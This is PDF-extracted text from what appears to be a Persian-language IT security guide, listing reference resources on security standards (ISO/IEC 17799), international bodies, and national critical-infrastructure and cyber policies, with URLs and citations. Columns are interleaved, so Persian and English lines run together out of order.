ﻣﻔﺎﺩ ﻃﺮﺡ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮ ﺳﻪ ﺟﻨﺒﻪ ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧـﺪ: ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺍﺻـﻠﻲ
(۱ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺮﺍﺭﺩﺍﺩ؛ (۲ﻣﻼﺣﻈﺎﺕ ﻣﺤﺮﻣـﺎﻧﮕﻲ؛ ﻣﺆﺳــﺴﻪ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﻪ ﺁﺩﺭﺱ www.gocsi.comﻭ
ﻭ (۳ﺍﺭﺯﺵ ﻭﺍﻗﻌﻲ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ .ﺍﻳـﻦ ﻣﻔـﺎﺩ ﺑـﻪ ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻖ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻄـﺮﺡ http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/F
ﻫﺴﺘﻨﺪ ﻣﺤﺪﻭﺩ ﻣﻲﺑﺎﺷﻨﺪ ،ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺑﺎ ﺗﻔﺴﻴﺮﻱ ﺍﺯ BI2003.pdf
ﺿﻮﺍﺑﻂ ﺣﺎﻝ ﺣﺎﺿﺮ ﻭ ﻣﺮﺳﻮﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎ ﺗﻔﺴﻴﺮ ﺷﻮﺩ.
ﺩﻓﺘﺮ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ) ٤٩٤(ICCﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺍﺳﺖ
٤٩٧FISCAMﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﺍﻋﻀﺎﻱ ﺁﻥ ﺷﺎﻣﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻢ ﻣﻲﺷـﻮﻧﺪ.
ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ: ﻓﻌﺎﻟﻴﺖ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ
http://www.gao.gov/special.pubs/ai12.19.6.pdf ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺜﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ،ﻭ ﻗـﻮﺍﻧﻴﻦ ﻣﺤﻴﻄﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ
ﻣﺆﺳﺴﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ) (ISOﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ .ﭘﺎﻳﮕﺎﻩ ﻭﺏ ICCﻭ ﺻﻔﺤﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻳﻦ ﺑﺤﺚ ﺭﺍ ﻣﻲ-
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺟﻬـﺎﻧﻲ ﺗـﺪﻭﻳﻦ ﻣـﻲﻛﻨـﺪ .ﻣﺠﻤﻮﻋـﺔ ﺍﻟﮕﻮﻫـﺎﻱ ﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ:
ﺳﺮﺁﻣﺪﻱ ﺍﻳـﻦ ﻣﺆﺳـﺴﻪ ﺩﺭ ﺣـﻮﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ http://www.iccwbo.org/home/menu_electroni
) ،(ISO/IEC17799ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺆﺳﺴﻪ ﺍﺳﺘﺎﻧﺪﺍﺭ ﻛﺸﻮﺭ ﺍﻧﮕﻠـﺴﺘﺎﻥ c_business.asp
) (BS 7799ﺭﺍ ﺗﻜﻤﻴﻞ ﻛﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺑﻌﻨـﻮﺍﻥ
ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﻮﺭﺩ ﻗﺒـﻮﻝ ﻭﺍﻗـﻊ ﺷـﺪﻩ ﻭ ﺍﻧﺘﻈـﺎﺭ ﺁﻥ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺧﻴﺮ ICCﻫﺴﺘﻨﺪ:
ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﻪ ﻳـﻚ ﺳـﻨﺪ ﻣﺮﺟـﻊ ﺩﺭ ﺗﻬﻴـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺑﻬﻴﻨـﺔ
ﺍﻟﻒ( ﺁﻳﻴﻦﻧﺎﻣﺔ ﺍﻣﻀﺎﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،٤٩٥ﻛﻪ ﻧﺘﻴﺠـﺔ ﺑﺮﺭﺳـﻲ ﻭ
ﺗﻀﻤﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻤﻦ ﻭ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ.
ﭘﺎﺳﺦ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎﻳﻲ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞﻫـﺎﻱ
ﺑﺮﺍﻱ ﺁﮔـﺎﻫﻲ ﺑﻴـﺸﺘﺮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺯﻳـﺮ ﻧﮕـﺎﻫﻲ
ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﺳـﭙﺘﺎﻣﺒﺮ ﺳـﺎﻝ ۲۰۰۳ﺗـﺴﻠﻴﻢ
ﺑﻴﺎﻧﺪﺍﺯﻳﺪ:
ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎﻳﻲ ﺷﺪﻩ ﺑﻮﺩ.
http://www.iso.org
ﻧﻤﻮﻧﺔ ﺑﺴﻴﺎﺭ ﺧﻮﺑﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻫﺪﺍﻑ ﺩﻭﻟﺖ ﺟﻬـﺖ ﺗﻨﻈـﻴﻢ (۳ ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨـﺔ
ﻃﺮﺣــﻲ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ ،ﺑـﻪ ﺟﻨﺒـﻪﻫـﺎﻱ
ﺍﺭﺗﺒﺎﻃﺎﺕ: ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻛﻪ ﺍﺯ ﺟﻤﻠﺔ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ
ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ :ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ،ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺘﻲ ،ﻃﺒﻘﻪﺑﻨﺪﻱ
The government's guidelines for the
development of the information society,
ﻭ ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ ،ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ،ﺍﻣﻨﻴﺖ ﻣﺤﻴﻄﻲ ﻭ ﻓﻴﺰﻳﻜـﻲ،
Minister for Innovation and Technologies, ﺍﻣﻨﻴــﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﻋﻤﻠﻴــﺎﺕ ،ﻛﻨﺘــﺮﻝ ﺩﺳﺘﺮﺳــﻲ ،ﺗﻮﺳــﻌﻪ ﻭ
Rome, June 2002.
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻢ ،ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ،ﻭ ﻣﺪﻳﺮﻳﺖ ﺗﺪﺍﻭﻡ ﻛﺴﺐ
ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺍﻳﻦ ﺧﺼﻮﺹ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ﻭ ﻛﺎﺭ.
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ﻃﺮﺡ ﻣﻠـﻲ
ﺁﺧﺮﻳﻦ ﺑﺎﺯﻧﮕﺮﻱ ﺩﺭ ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﺍﻧﺠﺎﻡ ﺷﺪﻩ
ﺍﻳﺘﺎﻟﻴﺎ ﺩﺭ ﺧﺼﻮﺹ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﻭ ﺍﻋﻼﻡ ﺷﺪﻩ ﻛـﻪ ﺑـﺎﺯﻧﮕﺮﻱ ﺑﻌـﺪﻱ ﺩﺭ ﺳـﭙﺘﺎﻣﺒﺮ ۲۰۰۵ﺍﻧﺠـﺎﻡ
ﻣﻲﺑﺎﺷﻨﺪ:
ﺧﻮﺍﻫﺪ ﺷﺪ.
http://www.innorazione.gov.it/eng/docu
menti/linee-guida-eng.pdf
ﻣﻄﺎﻟﺐ ﺑﻴﺸﺘﺮ ﺭﺍﺟﻊ ﺑـﻪ ﺑﺨـﺸﻬﺎﻱ ﺳـﻮﻡ ﻭ
ﻣﺮﺍﺟﻊ ﺍﻟﮕﻮﻫﺎ ،ﻣﻮﺿﻮﻋﺎﺕ ،ﻭ ﻣﻀﺎﻣﻴﻦ ﺳﻴﺎﺳـﺖ ﻓﻨـﺎﻭﺭﻱ (۴
ﭼﻬﺎﺭﻡ ﻛﻪ ﺑﺮ ﻣﻮﺍﺭﺩ ﻭ ﻗﻮﺍﻧﻴﻦ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ
ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺟﻬــﺎﻧﻲ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﻭ
ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻳﺎﻓﺖ: ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ:
http://www.markle.org/globalpolicy
ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻘﺮﺍﺭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ: (۱
ﺍﻳﻦ ﻧﻬﺎﺩ ﺑـﺮ ﻣـﺸﺎﺭﻛﺖ ﻣـﺆﺛﺮ ﻭ ﻋﻤﻠـﻲ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﺩ ﻭ ﺍﺯ http://ww.audit.nsw.gov.au/guides-bp/e-
govt-BPG.pdf
ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﻜﻞ ﻣﻲ ﮔﻴـﺮﺩ ﻭ
ﻳﻚ ﺗﻴﻢ ﻛﺎﺭ ﺍﺑﺰﺍﺭﻱ ﺑﺮ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺤﻠﻲ ﺍﺯ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ،ﺑﻬﺘﺮﻳﻦ ﻭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘـﺮﻝ ﺩﺭ
ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺩﻭﻟﺖ ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﺪ )ﮊﻭﺋﻦ ﺳﺎﻝ .(۲۰۰۲ ﻣﻮﺭﺩ ﺩﻭﻟﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﺑﺮﺍﻱ ﺧﻮﺩ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ ) ۲۰ﺻـﻔﺤﻪ( .ﻣﻄﺎﻟـﺐ ﻗﺎﺑـﻞ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ITUﺩﺭﺑﺮﮔﻴﺮﻧـﺪﺓ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ (۵
ﺗﻮﺟــﻪ :ﻓــﺼﻠﻬﺎﻳﻲ ﺩﺭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﻣﺤﺮﻣــﺎﻧﮕﻲ ،ﺍﻣﻨﻴــﺖ ﻭ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺳﻴﺎﺳﺘﻲ ﻭ ﻧﻈﺎﺭﺗﻲ ﺍﺳﺖ:
ﻣــﺪﻳﺮﻳﺖ ﺍﻃﻼﻋــﺎﺕ ﻭ ﻓﻨــﺎﻭﺭﻱ )ﺍﺩﺍﺭﺓ ﻣﻤﻴــﺰﻱ ﻭﻟــﺰ ﺟﻨــﻮﺑﻲ،
http://www.itu.int/osg/spu/ni/security/link
s/policy.html ﺍﺳﺘﺮﺍﻟﻴﺎ (٤٩٨ﻣﻲﺑﺎﺷﺪ.
ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺭﻭﻳﻜﺮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ:٤٩٩
http://www.itu.int/ITU-D/e-strategy/internet/ ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﺩﺭ ﺧﺼﻮﺹ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ (۲
ﺣﻴﺎﺗﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﻳﺎﺩﺩﺍﺷﺖ ﺗﻔﺎﻫﻢ ﺍﻋﺘﻤﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٥٠٠ﺟﻬﺎﻧﻲ:
ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ:
http://www.itu.int/ITU-D/e-
http://www.itu.int/osg/spu/ni/security/ind
strategy/MoU/world_e.html
ex.html
ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ :ﺍﺳﺘﺮﺍﺗﮋﻱ ﻓﻨﺎﻭﺭﻱ ﺑـﺮﺍﻱ
ﺑﺨﺶ ﺷﺸﻢ
499 E-Strategy
500 E-Trust 498 Audit Office of New-South Wales, Australia
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٧٢
Goodman E., Seymour, Hassebroek B., Claessens Stijn, Glaessner Thomas and
Pamela, King, Davis and Ozment, Andy, Klingebiel Daniela, E-Finance in Emerging
International Coordination to Increase the Markets: Is Leapfrogging Possible?
Security of Critical Network Infrastructures,
May 20-22, 2002, Seoul. Commission of the European Communities:
Network and Information Security: Proposal
for A European Policy Approach – Brussels,
Harrop, Mike, Creating Trust in Critical
Network Infrastructures –Canadian Case June 6, 2001.
Study, May 20-22, 2002, Seoul, Korea.
Commission of the European Communities:
Creating a Safer Information Society by
International Telecommunications Union-
Improving the Security of Information
Telecommunications Standardization Sector
Infrastructures and Combating Computer-
(ITU-T) – Lead Study Group 17 on
related Crime – eEurope 2002, Brussels,
Communications and Systems Security
(www.itu.int/ITU-T/). January 26, 2001.
ﺷﺪﻩ ﺩﺭ ﻣﺠﻼﺕ ﺣﻘـﻮﻗﻲ ﻛـﻪ ﺑـﻪ ﺗﺤﻠﻴـﻞ ﻋﻤﻴـﻖﺗـﺮ ﻣـﺴﺎﺋﻞ Implementation of the eEurope 2005 Action
Plan, February 18, 2003.
:ﻣﻲﭘﺮﺩﺍﺯﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ
http://www.spamlaws.com/
OECD Guidelines for the Security of
Information Systems and Networks –
ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴـﺖ ﻣﻌﻨـﻮﻱ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱWIPO
Towards a Culture of Security.
ﻋﻀﻮ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳـﺎﻧﺪﻩ ﻛـﻪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
:ﺍﺳﺖ Privacy Amendment Act of Australia (Private
http://www.wipo.org/about- Sector)
- Act 2000
ip/en/ipworldwide/index.html.
Security of Internet Enabled Wireless
Devices, Wireless Task Force Findings,
:ﻣﺮﺟﻊ ﺍﺻﻠﻲ ﭘﺎﻭﺭﻗﻲﻫﺎﻱ ﺑﺨﺶ ﭼﻬﺎﺭﻡ National Security Telecommunications
http://www.usdoj.gov/04foia/privstat.htm Advisory Committee, January 2003.
ﺩﺭ ﺍﻋــﻼﻡ،ﻣــﺴﺎﺋﻞ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺣﻴــﺎﺗﻲ ﺑﭙــﺮﺩﺍﺯﺩ ﺭﺍﻫﻬﺎﻱ ﺩﺭﻳﺎﻓـﺖ ﻗـﻮﺍﻧﻴﻦ ﺿـﺪﻫﺮﺯﻧﺎﻣﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ
ﻭ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻭﻟـﺖ،ﻫﺸﺪﺍﺭ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺣﻤﻼﺕ ﻛﻤﻚ ﻛﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻘﺎﻻﺕ ﭼـﺎﭖ
.ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺖ ﺭﺍ ﺗﺴﻬﻴﻞ ﻧﻤﺎﻳﺪ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٧٤
U.S. Presidential Decision Directive 62: ﻳﻚ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﻪ ﻧـﺎﻡNISCC ﺩﺭ
http://www.fas.org/irp/offdocs/pdd-62.htm
ﻳــﻚ ﮔــﺮﻭﻩ ﻭﺍﻛــﻨﺶ ﺑــﻪ ﺣﻤــﻼﺕ. ﻭﺟــﻮﺩ ﺩﺍﺭﺩUNIRAS
E.O. 13228, Establishing the Office of ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺗـﺎNISCC ﻧﻴـﺰ ﺩﺭ٥٠١(EARG) ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
Homeland Security and the Homeland ﻫﻨﮕﺎﻣﻴﻜﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ
Security Council, October 8, 2001,
http://fas.org/irp/offdocs/eo/eo-13228.htm;
ﺍﻃﻼﻋـﺎﺕUNIRAS .ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨﺪ
ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﺁﮔﺎﻫﻲ ﺑﺨﺶ ﺭﺍ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻌـﺎﻝ
E.O.13231, Critical Infrastructure Protection NISCC ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ.ﺗﺠﺎﺭﻱ ﺩﺭ ﺑﺮﻳﺘﺎﻧﻴـﺎ ﺍﺭﺍﺋـﻪ ﻣـﻲ ﺩﻫـﺪ
in the Information Age, October 16, 2001:
http://www.ciao.gov/News/EOonCriticalInfras ( ﻧﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺮﻭﺣﻲ ﺩﺭ ﻣـﻮﺭﺩhttp://www.niscc.gov.uk)
trutureProtection101601.html .ﺭﺍﻫﺒﺮﺩ ﺩﻭﻟﺖ ﺑﺮﻳﺘﺎﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ
The National Strategy to Secure
Cyberspace, Feb. 14, 2003, ﻧﻬﺎﺩﻫـﺎﻱ ﻏﻴﺮﺩﻭﻟﺘـﻲ، ﻣﺆﺳﺴﺎﺕ ﺍﺟﺮﺍﻳـﻲ،ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﺍﺳﺘﺮﺍﻟﻴﺎ
http://www.dhs.gov/interweb/assetlibrary/Nat ﺍﻳـﻦ.ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳـﻂ ﻧﻤﺎﻳﻨـﺪﺓ ﺩﻭﻟـﺖ ﺗﺄﺳـﻴﺲ ﻣـﻲﺷـﻮﻧﺪ
ional_Cyberspace_Strategy.pdf.
ﻻ ﻣﺆﺳـﺴﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻋﻤﻠﻜﺮﺩﺷـﺎﻥ ﺑﺎﻳـﺪ ﻣﺆﺳﺴﺎﺕ ﻣﻌﻤﻮ ﹰ
The National Strategy to Secure ﻭﺳﻌﺘﻲ ﺩﺭ ﺣﺪ ﺩﻭﻟﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ
Cyberspace; by The National Strategy for
the Physical Protection of Critical
ﻣﺪﻳﺮ ﻳـﻚ ﻣﺆﺳـﺴﻪ.ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﺯ ﺩﻭﻟﺖ ﻣﺮﻛﺰﻱ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ
Infrastructures and Key Assets, released ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻭﺯﻳﺮ ﺍﻧﺘﺨﺎﺏ ﻣﻲﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﺎﻥ ﻭﺯﻳـﺮ
March 4, 2003, . ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ( ﻧﻴﺰ ﭘﺎﺳﺨﮕﻮ ﺍﺳﺖ،)ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ
http://www.dhs.gov/interweb/assetlibrary/Ph
ysical_Strategy.pdf :ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ
http://www.noie.gov.au/projects/confidence/p
Implementing components of The National rotecting/nat_agenda.htm.
Strategy for Homeland Security, issued by
the White House; July 16, 2002. International Critical Information
Infrastructure Protection Handbook, edited
European Commission, Proposal for a by Andreas Wenger, Jan Metzger and
Regulation of the European Parliament and Myriam Dunn, Center for Security Studies
of the Council Establishing the European and Conflict Research, Swiss Federal
Network and Information Security Agency, Institute of Technology (2002)
Feb.11, 2003, COM (2003) 63 final, http://www.isn.ethz.ch/crn
2003/0032 (COD):
http://europa.eu.int/information_society/eeurop ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﺍﺯ
e/action_plan/safe/documents/nisa_en.pdf
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ،ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ
Council resolution of 28 Jan. 2002; :ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ
European Commission, Communication International Critical Information
from the Commission to the Council, the Infrastructure Protection Handbook, edited
European Parliament, the European by Andreas Wenger, Jan Metzger and
